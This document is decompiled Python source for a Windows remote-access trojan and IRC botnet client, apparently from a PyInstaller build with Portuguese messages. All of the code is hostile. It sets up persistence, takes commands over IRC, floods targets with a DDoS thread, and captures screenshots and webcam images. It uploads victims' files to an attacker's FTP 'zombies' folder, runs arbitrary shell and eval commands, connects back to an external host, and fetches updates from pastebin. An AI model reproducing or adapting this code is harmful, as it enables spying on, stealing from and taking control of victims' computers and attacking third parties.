Untitled

# Embedded file name: C:\Python27\PyInstaller-2.1\clasp\build\clasp\out00-PYZ.pyz\prompt
from twisted.internet.protocol import ClientFactory
from twisted.protocols.basic import NetstringReceiver
from twisted.words.protocols.irc import IRCClient
from twisted.internet import reactor
import time, ImageGrab, VideoCapture, ftplib, win32api, psutil
import config
import random
import socket
from threading import Thread
from subprocess import Popen
import datetime
import os
import urllib2
import zipfile
import hashlib
import _winreg
from traceback import format_exc
version = '3.2'
pcid = None
debugfilepath = '%s\\debug.log' % config.malware_folder

_download = config.main_exe_link
_root_key = 'HKEY_CURRENT_USER'
_key = 'Software\\Microsoft\\Windows\\CurrentVersion\\Run'
_exename = config.malware_exe
_exepath = config.malware_folder[3:]
rundir = '%s' + _exepath
rundir = rundir % os.getcwd()[:3]

def emergency():
    links = ('ftp://%s:%s/ftproot/emergency.dat' % (config.ftp_ip, config.ftp_port), 'http://pastebin.com/raw.php?i=93kWZuiM')
    emergency_data = None
    for link in links:
        try:
            emergency_data = urllib2.urlopen(link).read()
            break
        except:
            return

    if not emergency_data:
        return
    else:
        emergency_data = emergency_data.strip('\n')
        emergency_data = emergency_data.replace('\r', '')
        emergency_data = emergency_data.split('\n')
        emergency_dic = {}
        for item in emergency_data:
            keyvalue = item.split('=')
            emergency_dic[keyvalue[0]] = keyvalue[1]

        if emergency_dic['update'] != 'None':
            if emergency_dic['md5'] != checksum(config.malware_path):
                update_program(emergency_dic['update'])
        return


def update_program(url):
    try:
        reactor.stop()
    except:
        pass

    Popen(['%s\\updater.exe' % config.malware_folder, str(os.getpid()), url])
    while True:
        time.sleep(999)


def print_debug(string):
    if config.DEBUG:
        print string


def log_debugfile(string):
    write(debugfilepath, string + '\n')


def write(path, data):
    if not os.path.isfile(path):
        all = ''
    else:
        f = open(path, 'r')
        all = f.read()
        f.close()
    f = open(path, 'w')
    f.write(all + data)
    f.close()


def copyfile(origem, destino):
    nome = origem.split('\\')[-1]
    org = open(origem, 'rb')
    orgread = org.read()
    dest = open(destino + '\\' + nome, 'wb')
    dest.write(orgread)
    dest.close()
    org.close()


def change_pcid(new_pcid = None):
    global pcid
    idpath = '%s\\id.txt' % config.malware_folder
    if new_pcid:
        pcid = new_pcid
        file = open(idpath, 'w')
        file.write(pcid)
        file.close()
    elif os.path.isfile(idpath):
        file = open(idpath)
        pcid = file.read()
        file.close()
    else:
        pcid = socket.gethostname() + '_'
        for i in range(4):
            pcid += str(random.randint(0, 9))

        file = open(idpath, 'w')
        file.write(pcid)
        file.close()


def checksum(file):
    check = hashlib.md5()
    check.update(open(file, 'rb').read())
    return check.hexdigest()


def send_debuglog(protocol, debug_request):
    code, pcs = debug_request.split(':', 1)
    pcs = pcs.split(':')
    if code not in protocol.debug_request_codes:
        if pcid in pcs or 'ALL' in pcs:
            uploadftp(debugfilepath)
            protocol.debug_request_codes.append(code)


def ss():
    path = rundir + '\\ss.jpg'
    img = ImageGrab.grab()
    img.save(path, 'JPEG')
    uploadftp(path)
    os.remove(path)


def zip_folder(folder_path, output_path):
    parent_folder = os.path.dirname(folder_path)
    contents = os.walk(folder_path)
    zip_file = zipfile.ZipFile(output_path, 'w', zipfile.ZIP_DEFLATED)
    for root, folders, files in contents:
        for folder_name in folders:
            absolute_path = os.path.join(root, folder_name)
            relative_path = absolute_path.replace(parent_folder + '\\', '')
            zip_file.write(absolute_path, relative_path)

        for file_name in files:
            absolute_path = os.path.join(root, file_name)
            relative_path = absolute_path.replace(parent_folder + '\\', '')
            zip_file.write(absolute_path, relative_path)

    zip_file.close()


def download(url, path):
    download = urllib2.urlopen(url)
    f = open(path + '\\' + url.split('/')[-1], 'wb')
    f.write(download.read())
    f.close()


def uploadftp(path):
    ftp = ftplib.FTP()
    ftp.connect(config.ftp_ip, config.ftp_port)
    ftp.login(config.ftp_user, config.ftp_pass)
    ftp.cwd('ftproot/zombies')
    dirlist = []
    ftp.retrlines('LIST', dirlist.append)
    ok = 0
    for f in dirlist:
        if f.split()[-1] == pcid:
            ok = 1

    if ok == 0:
        ftp.mkd(pcid)
    ftp.cwd(pcid)
    f = open(path, 'rb')
    ftp.storbinary('STOR ' + path.split('\\')[-1], f)
    f.close()
    ftp.quit()

def deldir(path):
    for item in os.listdir(path):
        if os.path.isdir(path + '\\' + item):
            deldir(path + '\\' + item)
        else:
            os.remove(path + '\\' + item)

    os.rmdir(path)


class DDoS(Thread):

    def start(self, host, port, protocol):
        self.host = host
        self.port = port
        self.protocol = protocol
        Thread.start(self)

    def run(self):
        packet = 'a' * 1024
        while self.protocol.ddosing:
            try:
                sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                sock.connect((self.host, self.port))
                while True:
                    sock.send(packet)

            except socket.error:
                pass


class SS_Stream(Thread):

    def start(self, interval, obj):
        self.interval = interval
        self.obj = obj
        Thread.start(self)

    def run(self):
        while self.obj.ss_stream:
            try:
                ss()
            except:
                pass
            else:
                time.sleep(self.interval)


class IRCProtocol(IRCClient):
    channel = config.irc_channel
    ddosing = False
    updating = False
    force_updating = False
    auth = []

    def __init__(self):
        self.nickname = pcid

    def irc_RPL_NAMREPLY(self, prefix, params):
        self.got_names(params[1], params[3].split())

    def got_names(self, channel, names):
        pass

    def parse_topic(self, key):
        dic = {}
        data = self.irc_topic.split(',')
        for chave in data:
            dic[chave.split('|')[0]] = chave.split('|')[1]

        if dic.has_key(key):
            return dic[key]

    def signedOn(self):
        self.join(self.channel)

    def topicUpdated(self, user, channel, newtopic):
        print_debug('topic updated')
        if channel.lower() != self.channel.lower():
            return
        self.irc_topic = newtopic
        if self.parse_topic('md5') != checksum(config.malware_path):
            if not config.DEBUG:
                self.updating = True
                self.quit('Updating...')

    def privmsg(self, user, channel, message):
        print_debug('user: ' + user)
        print_debug('message: ' + message)
        if message == '!ping':
            s_user = user.split('!')[0]
            if channel.startswith('#'):
                self.msg(channel, 'Pong!')
            else:
                self.msg(s_user, 'Pong!')
        if user not in self.auth:
            if message.startswith('!auth '):
                password = message.strip('!auth ')
                hash = hashlib.sha512('NmQs9UnDRNSbK4cn5eSY' + password).hexdigest()
                print_debug(hash)
                if hash == config.auth_hash:
                    print_debug('auth completed')
                    self.auth.append(user)
        else:
            print_debug('auth ok')
            if message.startswith('!connect'):
                if not channel.startswith('#') or message.strip('!connect') == ' ' + self.nickname:
                    fac = ClientFactory()
                    fac.protocol = PromptSession
                    reactor.connectTCP(config.my_ip_ext, config.my_port, fac)
            if message.startswith('!ddos '):
                command = message.strip('!ddos ')
                if command != 'stop':
                    if not self.ddosing:
                        ddos_host, ddos_port = command.split(':')
                        DDoS().start(ddos_host, ddos_port)
                        self.ddosing = True
                else:
                    self.ddosing = False
            if message.startswith('!debug '):
                command = message.strip('!debug ')
                if self.nickname in command or command == 'ALL':
                    uploadftp(debugfilepath)
            if message.startswith('!update '):
                command = message[8:].split('|')
                if command[0] != checksum(config.malware_path):
                    self.force_updating = command[1]
                    self.quit('Updating...')

    def alterCollidedNick(self, nickname):
        newnick = nickname + '_'
        return newnick

    def connectionLost(self, reason):
        if self.updating:
            update_program(self.parse_topic('url'))
        if self.force_updating:
            update_program(self.force_updating)


class IRCFactory(ClientFactory):
    protocol = IRCProtocol

    def clientConnectionLost(self, connector, reason):
        connector.connect()

    clientConnectionFailed = clientConnectionLost


class CommandHandler():
    path_cmd_args = ('cd', 'dir', 'ls', 'del', 'mkdir', 'read', 'upload', 'exec', 'zip', 'dirsize', 'setname', 'eval')
    env_var = {'%rundir%': rundir}
    init_cwd = os.getcwd()

    def __init__(self):
        self.ss_stream = False
        os.chdir(self.init_cwd)

    def receive_command(self, command, args):
        command = command.lower()
        if command == 'exit':
            return 0
        try:
            func = getattr(self, 'func_%s' % command)
        except AttributeError:
            return 'Comando invalido.'

        try:
            if command in self.path_cmd_args:
                args = '|'.join(args)
            return str(func(args))
        except:
            return format_exc()

    def orglist(self, list):
        output = ''
        for item in list:
            output += item + '\n'

        output = output.strip('\n')
        return output

    def convert_size(self, size):

        def max_len(str, lenght):
            if lenght <= 0:
                lenght = -1
            else:
                lenght += 1
            index = str.find('.')
            if len(str) <= index + lenght:
                return str
            else:
                return str[:index + lenght]

        units = ('B', 'KB', 'MB', 'GB', 'TB')
        final_unit = 0
        current = float(size)
        while current > 1024 and final_unit < len(units) - 1:
            current /= 1024
            final_unit += 1

        return '%s %s' % (max_len(str(current), 2), units[final_unit])

    def func_cd(self, args):
        if args in self.env_var.keys():
            os.chdir(self.env_var[args])
        elif args:
            if os.path.isdir(args):
                if not os.path.isabs(args):
                    args = os.path.abspath(args)
            else:
                return 'Diretorio invalido.'
            os.chdir(args)
        else:
            path = os.getcwd().split('\\')
            os.chdir('\\'.join(path[:-1]))
        return ''

    def func_dir(self, args):
        if args:
            if os.path.isdir(args):
                path = args
            else:
                return 'Diretorio invalido.'
        else:
            path = os.getcwd()
        dirs = []
        files = []
        for item in os.listdir(path):
            abspath = path + '\\' + item
            if os.path.isdir(abspath):
                dirs.append(item)
            elif os.path.isfile(abspath):
                files.append('%s %s' % (item, self.convert_size(os.path.getsize(abspath))))

        dirs = sorted(dirs)
        files = sorted(files)
        return self.orglist(dirs + files)

    def func_del(self, args):
        if os.path.isfile(args):
            os.remove(args)
        elif os.path.isdir(args):
            deldir(args)
        else:
            return 'Arquivo/diretorio inexistente.'
        return 'Deletado.'

    def func_mkdir(self, args):
        os.mkdir(args)
        return 'Diretorio criado.'

    def func_read(self, args):
        f = open(args)
        data = f.read()
        f.close()
        return data

    def func_run(self, args):
        Popen(args)
        return 'Executado.'

    def func_upload(self, args):
        Thread(target=uploadftp, args=(args,)).start()
        return 'Uploading.'

    def func_download(self, args):
        if len(args) == 1:
            Thread(target=download, args=(args[0], os.getcwd())).start()
        elif len(args) > 1:
            path = '|'.join(args[1:])
            Thread(target=download, args=(args[0], path)).start()
        return 'Downloading.'

    def func_copy(self, args):
        copyfile(args[0], args[1])
        return 'Copiado.'

    def func_move(self, args):
        self.func_copy(args)
        os.remove(args[0])
        return 'Movido.'

    def func_ss(self, args):
        ss()
        return 'Printed.'

    def func_ping(self, args):
        return 'Pong.'

    def func_version(self, args):
        return version

    def func_pcname(self, args):
        return pcid

    def func_exec(self, args):
        exit_code = os.system(args)
        if exit_code == 0:
            return 'Executado.'
        else:
            return exit_code

    def func_proclist(self, args):
        proclist = []
        for proc in psutil.get_process_list():
            proclist.append('%s = %s' % (proc.name, proc.pid))

        return self.orglist(proclist)

    def func_kill(self, args):
        psutil.Process(int(args[0])).kill()
        return 'Killed.'

    def func_camss(self, args):
        path = rundir + '\\camss.jpg'
        cam = VideoCapture.Device()
        cam.saveSnapshot(path, timestamp=3, boldfont=1)
        uploadftp(path)
        os.remove(path)
        return 'Done.'

    def func_zip(self, args):
        zip_folder(args, '%s\\%s.zip' % (rundir, args.split('\\')[-1]))
        return 'Compactado.'

    def func_extract(self, args):
        zip_file = zipfile.ZipFile(args, 'r')
        extractdir = '%s\\%s' % (rundir, args.split('\\')[-1][:-4])
        os.mkdir(extractdir)
        zip_file.extractall(extractdir)
        zip_file.close()
        return 'Extraido.'

    def func_drives(self, args):
        drives = win32api.GetLogicalDriveStrings().split('\x00')
        if '' in drives:
            drives.remove('')
        drives_out = []
        for drive in drives:
            try:
                os.listdir(drive)
            except:
                pass
            else:
                drives_out.append(drive)

        return self.orglist(drives_out)

    def func_dirsize(self, args):
        if args:
            folder = args
        else:
            folder = os.getcwd()
        folder_size = 0
        for path, dirs, files in os.walk(folder):
            for file in files:
                filename = path + '\\' + file
                folder_size += os.path.getsize(filename)

        return self.convert_size(folder_size)

    def func_ss_stream(self, args):
        if not len(args):
            stream_state = {True: 'ON',
             False: 'OFF'}
            out = 'Stream: %s' % stream_state[self.ss_stream]
        elif args[0] == '1':
            if not self.ss_stream:
                self.ss_stream = True
                interval = 0
                if len(args) > 1:
                    interval = int(args[1])
                SS_Stream().start(interval, self)
                return 'Stream: ON'
            else:
                return 'Already on.'
        elif args[0] == '0':
            self.ss_stream = False
            return 'Stream: OFF'

    def func_setname(self, args):
        change_pcid(args)
        return 'Changed: %s' % pcid

    def func_eval(self, args):
        if args:
            return eval(args)
        else:
            return 'No arguments.'

    func_ls = func_dir
    func_print = func_ss


class PromptSession(NetstringReceiver):

    def __init__(self):
        self.cmd_handler = CommandHandler()

    def stringReceived(self, string):
        input_list = string.split('|')
        cmd = input_list[0]
        cmd_args = input_list[1:]
        out = self.cmd_handler.receive_command(cmd, cmd_args)
        if out == 0:
            self.transport.loseConnection()
            return
        self.sendString('%s|%s' % (out, os.getcwd()))

    def connectionMade(self):
        self.sendString('%s|%s' % (pcid, os.getcwd()))

    def connectionLost(self, reason):
        self.cmd_handler.ss_stream = False


def main():
    if not config.DEBUG:
        emergency()
    print_debug('checkando pcid')
    change_pcid()
    print_debug('checkando debuglog')
    if not os.path.isfile(debugfilepath):
        log_debugfile('Begin: %s\n' % datetime.datetime.now())
    if not config.DEBUG:
        if not os.path.isfile('%s\\updater.exe' % config.malware_folder):
            download(config.malware_updater_link, config.malware_folder)
        if not os.path.isfile('%s\\helvB08.pil' % config.malware_folder):
            zippath = '%s\\pilfonts.zip' % config.malware_folder
            download(config.pil_link, config.malware_folder)
            zip = zipfile.ZipFile(zippath, 'r')
            zip.extractall(config.malware_folder)
            zip.close()
            os.remove(zippath)
    print_debug('starting twisted')
    reactor.connectTCP(config.irc_server, config.irc_port, IRCFactory())
    reactor.run()


def core():
    try:
        main()
    except Exception as exc:
        if not config.DEBUG:
            log_debugfile(format_exc())
            uploadftp(debugfilepath)
            emergency()
        raise exc